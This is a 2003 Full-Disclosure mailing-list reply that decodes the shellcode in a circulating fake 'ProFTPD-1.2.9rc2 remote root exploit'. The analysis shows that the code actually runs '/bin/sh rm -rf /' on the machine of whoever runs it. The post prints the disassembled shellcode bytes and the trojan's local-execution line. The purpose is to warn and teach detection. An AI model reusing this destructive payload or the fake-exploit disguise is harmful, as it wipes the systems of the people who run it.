[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
- To: GARCIA Lionel <lionel.garcia@airbus.com>
- Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
- From: Philipp Buehler <pb+full-disclosure@mlsub.buehler.net>
- Date: Fri, 24 Oct 2003 17:34:53 +0200
On 24/10/2003, GARCIA Lionel <lionel.garcia@airbus.com> wrote To
full-disclosure@lists.netsys.com:
> ---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\
obscure the obvious :)
> The shellcode seems to be locally launched. Anybody to "decrypt" the
> shellcode ?
Well, not "fully", since this already gives enough clues:
\x31\xc0 xorl %eax,%eax
\x50 pushl %eax
\x68\x66\x20\x2f\x58 pushl $0x66202f58 !"f /X"
\x68\x6d\x20\x2d\x72 pushl $0x6d202d72 !"m -r"
\x68\x2d\x63\x58\x72 pushl $0x2d635872 !"rcXr"
\x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA"
\x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA"
\x68\x2f\x73\x68\x43 pushl $0x2f736843 !"/shC"
\x68\x2f\x62\x69\x6e pushl $0x2f62696e !"/bin"
\x31\xc0 xorl %eax,%eax
Then some "creative hopping" to connect this to an "/bin/sh rm -rf /"
If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>
'LOVE' in the air ... :)
ciao
--
Philipp Buehler, aka fips | <double-p>
When the horse dies, get off.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html